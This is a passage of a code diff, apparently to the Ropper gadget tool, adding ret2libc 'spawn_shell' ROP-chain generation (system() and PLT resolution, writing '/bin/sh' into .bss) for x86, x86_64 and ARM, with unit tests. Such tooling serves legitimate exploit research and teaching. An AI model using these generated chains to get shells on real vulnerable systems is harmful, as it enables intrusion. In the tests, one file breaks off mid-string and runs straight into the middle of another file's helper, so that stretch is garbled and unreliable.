insn.address): + return prev.address + return insn.address + prev = insn + return None + + def _armAddImmediate(self, ops, CS_OP_IMM): + """Value added by an ARM ``add`` immediate form. GAS/capstone render a + rotated modified-immediate as two operands ``#imm, #rot`` (value = + ``imm`` rotated right by ``rot``, as the PLT's ``add ip, pc, #0, #12``); + a plain ``add ip, ip, #8`` has a single immediate operand.""" + imms = [o.imm & 0xffffffff for o in ops[2:] if o.type == CS_OP_IMM] + if not imms: + return None + if len(imms) == 1: + return imms[0] + value, rot = imms[0], imms[1] & 31 + if rot == 0: + return value + return ((value >> rot) | (value << (32 - rot))) & 0xffffffff + + def _scanPltArm(self, md, code, base, got, CS_OP_MEM, CS_OP_IMM): + """Find an ARM PLT entry of the form + ``add ip, pc, #imm ; [add ip, ip, #imm ;] ldr pc, [ip, #imm]!`` whose + effective GOT dereference equals ``got``. Returns the address of the + leading ``add ip, pc`` (the stub entry point).""" + IP = ('ip', 'r12') + PC = ('pc', 'r15') + ip = None + entry_start = None + for insn in md.disasm(code, base): + m = insn.mnemonic + ops = insn.operands + if (m.startswith('add') and len(ops) >= 3 + and md.reg_name(ops[0].reg) in IP): + src = md.reg_name(ops[1].reg) + val = self._armAddImmediate(ops, CS_OP_IMM) + if val is None: + ip, entry_start = None, None + elif src in PC: # ARM PC reads as addr + 8 + ip = insn.address + 8 + val + entry_start = insn.address + elif src in IP and ip is not None: + ip += val + else: + ip, entry_start = None, None + elif m.startswith('ldr') and ip is not None and ops: + if (md.reg_name(ops[0].reg) in PC and len(ops) > 1 + and ops[1].type == CS_OP_MEM and md.reg_name(ops[1].mem.base) in IP): + if ((ip + ops[1].mem.disp) & 0xffffffff) == got and entry_start is not None: + return entry_start + ip, entry_start = None, None + return None + + def _findExistingString(self, text): + """Return the virtual address of an existing occurrence of ``text`` in + the primary binary, or ``None``.""" + binary = self._binaries[0] + try: + results = binary.searchString(text) + except BaseException: + return None + if results: + return results[0][0] + return None + + def _useBinaryForRebase(self, binary=None): + """Ensure ``binary`` (default: the primary binary) is registered in + ``_usedBinaries`` and return its ``rebase_N`` index. + + Gadget selection normally registers a binary as a side effect, but a + ret2libc chain may need to rebase an address (a resolved symbol, a + ``.data`` buffer) without having selected any gadget from that binary + yet. Rebasing only depends on the file (image base), not the section, + so an existing entry for the same file is reused when present.""" + binary = binary or self._binaries[0] + for idx, (fileName, _section) in enumerate(self._usedBinaries): + if fileName == binary.checksum: + return idx + # Register with the SAME (fileName, section) identity gadgets use, so a + # later _updateUsedBinaries(gadget) for this binary reuses this entry + # instead of emitting a second, identical IMAGE_BASE line. Gadget + # sections are identified by name (e.g. 'LOAD'), not Section objects. + gadgets = self._gadgets.get(binary) + if gadgets: + self._usedBinaries.append((gadgets[0].fileName, gadgets[0].section)) + else: + self._usedBinaries.append((binary.checksum, binary.executableSections[0])) + return len(self._usedBinaries) - 1 + + def _findWritableSection(self, min_size, prefer=('.bss', '.data')): + """Return ``(name, virtualAddress, offset, size)`` of a writable, + allocated section with at least ``min_size`` bytes of room (preferring + ``.bss`` then ``.data``, then any other), or ``None``. + + Writability and size are read straight from the ELF section headers + (``SHF_WRITE`` / ``sh_size``) so the choice is *verified natively* + rather than assumed. ``.bss`` is SHT_NOBITS -- it occupies no file + bytes (``getSection('.bss').size`` would raise) -- but it is writable + and zero-filled at runtime, which is exactly what we want for a scratch + buffer, so the size is taken from ``sh_size`` here.""" + binary = self._binaries[0] + inner = getattr(binary, '_binary', None) + sections = getattr(inner, 'sections', None) + if not sections: + return None + try: + import filebytes.elf as _elf + W = _elf.SHF.WRITE + A = _elf.SHF.ALLOC + TLS = getattr(_elf.SHF, 'TLS', 0x400) + except BaseException: + W, A, TLS = 0x1, 0x2, 0x400 + found = {} + try: + for shdr in sections: + h = shdr.header + flags = h.sh_flags + if (flags & W) and (flags & A) and not (flags & TLS) and h.sh_size >= min_size: + name = shdr.name + found.setdefault(name, (name, h.sh_addr, h.sh_addr - binary.imageBase, h.sh_size)) + except BaseException: + return None + for name in prefer: + if name in found: + return found[name] + for info in found.values(): + return info + return None + + # ------------------------------------------------------------------ + # ret2libc (spawn_shell) building blocks shared by every architecture. + # + # Architectures differ only in address width and in how a string is + # written into a scratch section (the gadget primitives differ), so those + # two pieces are exposed as overridable hooks and everything else is + # generic. + # ------------------------------------------------------------------ + def _addressWidth(self): + """Address width in bytes for hex formatting (4 = 32-bit default).""" + return 4 + + def _writeCmdToMemory(self, cmd, where): + """Return a chain fragment that writes the NUL-terminated ``cmd`` into + the binary at ``where`` (an image-base-relative offset). Architecture + bases override this; the default signals that no write strategy is + available.""" + raise RopChainError('No memory-write strategy for this architecture') + + def _nulTerminateAndPad(self, cmd, width=None): + """NUL-terminate ``cmd`` and pad it up to a whole number of ``width`` + (default: the address width) byte words. The terminator is appended + *unconditionally* -- a command whose length is already a multiple of + ``width`` must still get a NUL so the written buffer is a valid C string + regardless of what follows it in memory (a zero-filled ``.bss`` would + mask a missing terminator, a ``.data`` fallback would not).""" + width = width or self._addressWidth() + what = cmd + '\x00' + if len(what) % width: + what += '\x00' * (width - len(what) % width) + return what + + def _rebaseLine(self, vaddr, comment): + """Emit a ``rop += rebase_N(offset) # comment`` line for an address + that lives *inside* the analysed binary (so it follows ASLR via the + existing ``rebase_N`` lambdas).""" + idx = self._useBinaryForRebase() + off = vaddr - self._binaries[0].imageBase + return 'rop += rebase_%d(%s) # %s\n' % (idx, toHex(off, self._addressWidth()), comment) + + def _resolveBinshPointer(self, cmd, string): + """Resolve a pointer to the command string for a ret2libc chain. + + Returns ``(chain_line, definitions, write_fragment)`` where + ``chain_line`` is the ``rop += ...`` line that yields the pointer, + ``definitions`` is any ``NAME = 0x..`` preamble it references, and + ``write_fragment`` is chain text that must run earlier to populate the + buffer (empty unless the string is written into a scratch section). + + Precedence: explicit ``string=`` address > an existing copy already + present in the binary (no write needed) > write ``cmd`` into a writable + scratch section (``.bss`` preferred) via write-what-where gadgets > + placeholder.""" + width = self._addressWidth() + if string is not None: + value = int(string, 16) if isinstance(string, str) else string + defs = 'BINSH_ADDR = %s # address of "%s" (supplied)\n' % (toHex(value, width), cmd) + return ('rop += p(BINSH_ADDR)\n', defs, '') + + # Reuse an existing copy of the string if the binary already contains + # one -- no write gadgets required. + found = self._findExistingString(cmd) + if found is not None: + self._printMessage('Found existing "%s" in the binary at %s' % (cmd, toHex(found, width))) + return (self._rebaseLine(found, '"%s" (found in binary)' % cmd), '', '') + + # Otherwise plant the string in a writable scratch section (.bss first). + # Round up to the address width to match how the write pads the buffer, + # and require the section to natively have that much room and be + # writable. + needed = len(cmd) + 1 + needed += (-needed) % width + section = self._findWritableSection(needed) + if section is not None: + name, vaddr, offset, size = section + try: + write_text = self._writeCmdToMemory(cmd, offset) + self._printMessage('Writing "%s" into %s at %s (%d of %d bytes)' + % (cmd, name, toHex(vaddr, width), needed, size)) + # Address the buffer with the SAME rebase convention the write + # uses (rebase_N(offset)), so the pointer and the written bytes + # always coincide -- including under a manually overridden image + # base. Do NOT route through _rebaseLine(), which expects an + # absolute virtual address and would subtract the image base a + # second time from this already-relative offset. + idx = self._useBinaryForRebase() + line = 'rop += rebase_%d(%s) # "%s" (written to %s)\n' % (idx, toHex(offset, width), cmd, name) + return (line, '', write_text) + except RopChainError as e: + self._printMessage('Cannot write "%s" into %s: %s' % (cmd, name, e)) + else: + self._printMessage('No writable section has room for "%s" (%d bytes).' % (cmd, needed)) + + self._printMessage('Could not resolve a pointer to "%s"; using placeholder BINSH_ADDR.' % cmd) + defs = 'BINSH_ADDR = 0x41414141 # TODO: set address of "%s"\n' % cmd + return ('rop += p(BINSH_ADDR)\n', defs, '') + + def _resolveSystemAddress(self, address): + """Resolve the address of libc ``system()`` for a ret2libc chain. + + Returns ``(chain_line, definitions)``. Precedence: explicit + ``address=`` (absolute, not rebased) > a ``system`` symbol defined in + this binary (rebased) > an import hint plus placeholder > placeholder.""" + width = self._addressWidth() + if address is not None: + value = int(address, 16) if isinstance(address, str) else address + defs = 'SYSTEM_ADDR = %s # libc system() (supplied)\n' % toHex(value, width) + return ('rop += p(SYSTEM_ADDR)\n', defs) + + sym = self._findSymbolAddress('system') + if sym is not None: + self._printMessage('Resolved system() from symbol table at %s' % toHex(sym, width)) + return (self._rebaseLine(sym, 'system()'), '') + + plt = self._findPltStub('system') + if plt is not None: + self._printMessage('Resolved system@plt at %s (verified against its GOT slot).' + % toHex(plt, width)) + return (self._rebaseLine(plt, 'system@plt'), '') + + got = self._findImportGotSlot('system') + if got is not None: + self._printMessage('system() is imported via PLT (GOT slot at %s) but its stub ' + 'could not be auto-resolved.' % toHex(got, width)) + self._printMessage('Pass address=.') + defs = ('SYSTEM_ADDR = 0xdeadbeef # TODO: libc system() ' + '(imported via PLT; GOT slot at %s)\n' % toHex(got, width)) + return ('rop += p(SYSTEM_ADDR)\n', defs) + + self._printMessage('Could not resolve system(); using placeholder SYSTEM_ADDR.') + defs = 'SYSTEM_ADDR = 0xdeadbeef # TODO: set libc system() address\n' + return ('rop += p(SYSTEM_ADDR)\n', defs) diff --git a/testcases/test_chain_arm.py b/testcases/test_chain_arm.py new file mode 100644 index 0000000..fc3e2ae --- /dev/null +++ b/testcases/test_chain_arm.py @@ -0,0 +1,56 @@ +# coding=utf-8 +# Tests for the ARM execve ropchain generator. +import unittest + +from ropper.service import RopperService +from ropper.common.error import RopperError + + +_ARM_BINARY = 'test-binaries/ls-arm' + + +def _generate(arch='ARM', options=None): + rs = RopperService(options={'all': False, 'type': 'all', 'inst_count': 6}) + rs.addFile(_ARM_BINARY, arch=arch) + rs.loadGadgetsFor(_ARM_BINARY) + return rs.createRopChain('execve', arch, options=options or {}) + + +class ARMExecveChain(unittest.TestCase): + + def test_arch_is_supported(self): + # Before this change, calling --chain execve on ARM raised + # "ArchitectureArm does not have support for execve chain generation". + # Confirm createRopChain no longer raises that for ARM. + try: + chain = _generate('ARM', {'cmd': '/bin/sh'}) + except RopperError as e: + self.fail('ARM execve chain raised RopperError: %s' % e) + self.assertIn('rop = ', chain) + + def test_chain_emits_header_and_rebase(self): + chain = _generate('ARM', {'cmd': '/bin/sh'}) + self.assertIn("p = lambda x : pack('> r) | (v << (32 - r))) & 0xffffffff + + ip = None + for insn in md.disasm(code, stub): + ops = insn.operands + if is_arm: + if insn.mnemonic.startswith('add') and len(ops) >= 3 and md.reg_name(ops[0].reg) in ('ip', 'r12'): + imms = [o.imm & 0xffffffff for o in ops[2:] if o.type == CS_OP_IMM] + if not imms: + continue + val = imms[0] if len(imms) == 1 else ror32(imms[0], imms[1]) + if md.reg_name(ops[1].reg) in ('pc', 'r15'): + ip = insn.address + 8 + val + elif ip is not None and md.reg_name(ops[1].reg) in ('ip', 'r12'): + ip += val + elif insn.mnemonic.startswith('ldr') and ip is not None and md.reg_name(ops[0].reg) in ('pc', 'r15'): + return (ip + ops[1].mem.disp) & 0xffffffff + else: + if 'jmp' in insn.mnemonic and ops and ops[0].type == CS_OP_MEM: + bn = md.reg_name(ops[0].mem.base) if ops[0].mem.base else None + if bn == 'rip': + return insn.address + insn.size + ops[0].mem.disp + if bn is None: + return ops[0].mem.disp & 0xffffffff + return None + + +class SpawnShellCommon(unittest.TestCase): + """Architecture-agnostic guarantees, run for every supported arch.""" + + def test_arch_is_supported(self): + for arch in _BINARIES: + try: + chain = _generate(arch, {'cmd': '/bin/sh'}) + except RopperError as e: + self.fail('spawn_shell raised RopperError for %s: %s' % (arch, e)) + self.assertIn('rop = ', chain, arch) + + def test_emits_runnable_skeleton(self): + for arch in _BINARIES: + chain = _generate(arch) + self.assertIn('from struct import pack', chain, arch) + self.assertIn("rop = ''", chain, arch) + self.assertIn('print(rop)', chain, arch) + + def test_supplied_addresses_are_used_verbatim_not_rebased(self): + # address= (libc system) and string= (&"/bin/sh") are absolute runtime + # addresses, so they must be emitted through plain p(), never rebased. + for arch in _BINARIES: + chain = _generate(arch, {'address': '0xf7c4d3e0', 'string': '0xcafe0000'}) + # Value width is arch-dependent (zero-padded to 4 or 8 bytes), so + # assert on the significant hex digits rather than exact formatting. + self.assertIn('SYSTEM_ADDR =', chain, arch) + self.assertIn('f7c4d3e0', chain, arch) + self.assertIn('BINSH_ADDR =', chain, arch) + self.assertIn('cafe0000', chain, arch) + self.assertIn('rop += p(SYSTEM_ADDR)', chain, arch) + self.assertIn('rop += p(BINSH_ADDR)', chain, arch) + # A supplied string must never trigger a .data write. + self.assertNotIn('written to .data', chain, arch) + self.assertNotIn("rop += '", chain, arch) + + def test_missing_system_falls_back_to_placeholder(self): + # None of the ls-* test binaries define or import system(), so the + # generator must degrade to a clearly-labelled placeholder. + for arch in _BINARIES: + chain = _generate(arch) + self.assertIn('SYSTEM_ADDR = 0xdeadbeef', chain, arch) + self.assertIn('TODO', chain, arch) + + +class SpawnShellX86(unittest.TestCase): + + def test_cdecl_layout_order(self): + # cdecl: [&system][return addr][&cmd] - system must precede the arg. + chain = _generate('x86', {'address': '0x11112222', 'string': '0x33334444'}) + sys_pos = chain.index('rop += p(SYSTEM_ADDR)') + arg_pos = chain.index('rop += p(BINSH_ADDR)') + self.assertLess(sys_pos, arg_pos) + self.assertIn('return address', chain) + + +class SpawnShellX86_64(unittest.TestCase): + + def test_uses_pop_rdi_and_alignment_ret(self): + chain = _generate('x86_64', {'address': '0x11112222', 'string': '0x33334444'}) + # ls-x86_64 ships a `pop rdi ; ret`. + self.assertIn('pop rdi', chain) + # rdi (arg) is loaded before the call to system. + self.assertLess(chain.index('pop rdi'), chain.index('rop += p(SYSTEM_ADDR)')) + # Stack alignment ret is added by default for glibc movaps. + self.assertIn('stack alignment', chain) + + def test_align_false_skips_alignment_ret(self): + chain = _generate('x86_64', {'address': '0x11112222', 'align': 'false'}) + self.assertNotIn('16-byte stack alignment for glibc', chain) + + +class SpawnShellARM(unittest.TestCase): + + def test_emits_placeholder_when_no_r0_pop(self): + # ls-arm has no `pop {r0, .., pc}` gadget, so a placeholder with the + # intended r0/pc slots must be emitted rather than raising. + chain = _generate('ARM', {'address': '0x11112222', 'string': '0x33334444'}) + self.assertIn('INSERT `pop {r0, pc}` GADGET HERE', chain) + self.assertIn('intended for r0', chain) + self.assertIn('intended for pc', chain) + + +class SpawnShellResolvers(unittest.TestCase): + """Direct coverage of the shared symbol/import resolution helpers.""" + + def test_imported_symbol_reports_got_slot_but_no_definition(self): + for arch in _BINARIES: + gen = _generator(arch) + # strlen is imported by every ls-* binary. + self.assertIsNotNone(gen._findImportGotSlot('strlen'), arch) + # ...but it is not *defined* inside the binary. + self.assertIsNone(gen._findSymbolAddress('strlen'), arch) + + def test_unknown_symbol_resolves_to_none(self): + for arch in _BINARIES: + gen = _generator(arch) + self.assertIsNone(gen._findImportGotSlot('totally_not_a_symbol_zzz'), arch) + self.assertIsNone(gen._findSymbolAddress('totally_not_a_symbol_zzz'), arch) + + def test_missing_string_resolves_to_none(self): + for arch in _BINARIES: + gen = _generator(arch) + self.assertIsNone(gen._findExistingString('this string is not present zzz'), arch) + + +class SpawnShellPltResolution(unittest.TestCase): + """Verified system@plt resolution (exercised via imported libc symbols, + since the bundled ls-* binaries import strlen/malloc/exit, not system).""" + + def test_resolved_stub_dereferences_the_symbols_got_slot(self): + for arch in _BINARIES: + gen = _generator(arch) + loader = gen._binaries[0] + for sym in ('strlen', 'malloc', 'exit'): + got = gen._findImportGotSlot(sym) + stub = gen._findPltStub(sym) + self.assertIsNotNone(got, '%s/%s' % (arch, sym)) + self.assertIsNotNone(stub, '%s/%s stub' % (arch, sym)) + # Ground truth: the resolved stub must dereference exactly the + # relocation's GOT slot (re-derived by an independent path). + self.assertEqual(_plt_deref(loader, stub), got, '%s/%s deref' % (arch, sym)) + + def test_distinct_symbols_resolve_to_distinct_stubs(self): + for arch in _BINARIES: + gen = _generator(arch) + self.assertNotEqual(gen._findPltStub('strlen'), gen._findPltStub('malloc'), arch) + + def test_non_imported_symbol_resolves_to_none(self): + for arch in _BINARIES: + gen = _generator(arch) + self.assertIsNone(gen._findPltStub('definitely_not_imported_zzz'), arch) + + def test_system_resolves_via_plt_stub_when_imported(self): + # No bundled binary imports system(), so map system's GOT lookup onto an + # actually-imported symbol's slot and confirm _resolveSystemAddress + # emits a rebased system@plt (not a SYSTEM_ADDR placeholder). + for arch in _BINARIES: + gen = _generator(arch) + slot = gen._findImportGotSlot('strlen') + gen._findImportGotSlot = lambda nm, _s=slot: _s if nm == 'system' else None + line, defs = gen._resolveSystemAddress(None) + self.assertIn('system@plt', line, arch) + self.assertIn('rebase_', line, arch) + self.assertEqual('', defs, arch) + self.assertNotIn('SYSTEM_ADDR', line, arch) + + +class SpawnShellRegression(unittest.TestCase): + """Regression coverage for defects found during review.""" + + def test_scratch_buffer_pointer_resolves_to_the_written_address(self): + # Defect: the write branch routed an already-image-base-relative offset + # through _rebaseLine(), which subtracted the image base a second time, + # so the pointer landed `imageBase` bytes away from where the string was + # written. The pointer must rebase exactly to the scratch buffer + # (== the chosen writable section's virtualAddress). Force the write + # branch with stubs so the test does not depend on the binary having a + # write-what-where gadget or lacking the string. + for arch in _BINARIES: + gen = _generator(arch) + gen._findExistingString = lambda s: None + gen._writeCmdToMemory = lambda cmd, where: "rop += 'STUB-WRITE'\n" + line, defs, write_text = gen._resolveBinshPointer('/bin/sh', None) + self.assertIn('written to', line, arch) + self.assertEqual('', defs, arch) + self.assertIn('STUB-WRITE', write_text, arch) + m = re.search(r'rebase_\d+\((0x[0-9a-fA-F]+)\)', line) + self.assertIsNotNone(m, '%s: %r' % (arch, line)) + emitted_off = int(m.group(1), 16) + section = gen._findWritableSection(8) + self.assertIsNotNone(section, arch) + _name, vaddr, _off, _size = section + self.assertEqual(emitted_off + gen._binaries[0].imageBase, vaddr, arch) + + def test_x86_64_padding_counts_extended_registers(self): + # Defect: _paddingNeededFor's `^pop (...)$` matched exactly three chars, + # silently dropping `pop r8` / `pop r9`, which under-padded the chain and + # let the extra pop swallow the next chain word. + gen = _generator('x86_64') + + class _FakeGadget(object): + lines = [(0, 'pop rdi'), (4, 'pop r8'), (8, 'pop r9'), (12, 'pop r15'), (16, 'ret')] + + self.assertEqual(gen._paddingNeededFor(_FakeGadget()), ['r8', 'r9', 'r15']) + + +class SpawnShellScratchWrite(unittest.TestCase): + """Default system('/bin/sh') with the .bss write fallback.""" + + def test_findwritable_returns_bss_with_native_size_and_address(self): + # .bss is SHT_NOBITS (getSection('.bss').size would crash), so the + # finder must read sh_addr/sh_size/sh_flags straight from the header. + for arch in _BINARIES: + gen = _generator(arch) + b = gen._binaries[0] + bss = next(s.header for s in b._binary.sections if s.name == '.bss') + sec = gen._findWritableSection(8) + self.assertIsNotNone(sec, arch) + name, vaddr, offset, size = sec + self.assertEqual(name, '.bss', arch) + self.assertEqual(vaddr, bss.sh_addr, arch) + self.assertEqual(offset, vaddr - b.imageBase, arch) + self.assertEqual(size, bss.sh_size, arch) + + def test_findwritable_rejects_oversized_request(self): + for arch in _BINARIES: + gen = _generator(arch) + self.assertIsNone(gen._findWritableSection(64 * 1024 * 1024), arch) + + def test_existing_string_is_preferred_over_writing(self): + # If the binary already contains the string, use it -- never write. + for arch in _BINARIES: + gen = _generator(arch) + gen._findExistingString = lambda s, _b=gen._binaries[0]: 0x1234 + _b.imageBase + wrote = [] + gen._writeCmdToMemory = lambda cmd, where: wrote.append(where) or 'X' + line, defs, write_text = gen._resolveBinshPointer('/bin/sh', None) + self.assertIn('found in binary', line, arch) + self.assertEqual('', write_text, arch) + self.assertEqual(wrote, [], arch) # write hook never invoked + + def test_written_string_is_always_nul_terminated_and_word_aligned(self): + # Regression: the ARM writer used to skip the NUL when len(cmd) was a + # multiple of 4, so a path like "/bin/cat" (8 chars) was written without + # a terminator -- only masked by a zero-filled .bss. All three writers + # share _nulTerminateAndPad, which must always terminate and word-align. + for arch in _BINARIES: + gen = _generator(arch) + width = gen._addressWidth() + for cmd in ('/bin/sh', '/bin/cat', '/usr/bin/sh', 'aaaaaaaa', 'a'): + padded = gen._nulTerminateAndPad(cmd) + msg = '%s/%r' % (arch, cmd) + self.assertTrue(padded.startswith(cmd), msg) + self.assertEqual(len(padded) % width, 0, msg) + self.assertEqual(padded[len(cmd)], '\x00', msg) # NUL right after cmd + self.assertGreaterEqual(len(padded), len(cmd) + 1, msg) + + def test_custom_path_is_written_when_absent(self): + # A user-supplied path (cmd=) flows verbatim into the scratch write. + for arch in _BINARIES: + gen = _generator(arch) + gen._findExistingString = lambda s: None + seen = {} + gen._writeCmdToMemory = lambda cmd, where: seen.update(cmd=cmd, where=where) or 'W' + line, defs, write_text = gen._resolveBinshPointer('/custom/path', None) + self.assertEqual(seen.get('cmd'), '/custom/path', arch) + self.assertIn('/custom/path', line, arch) + self.assertIn('written to', line, arch) + + +if __name__ == '__main__': + unittest.main()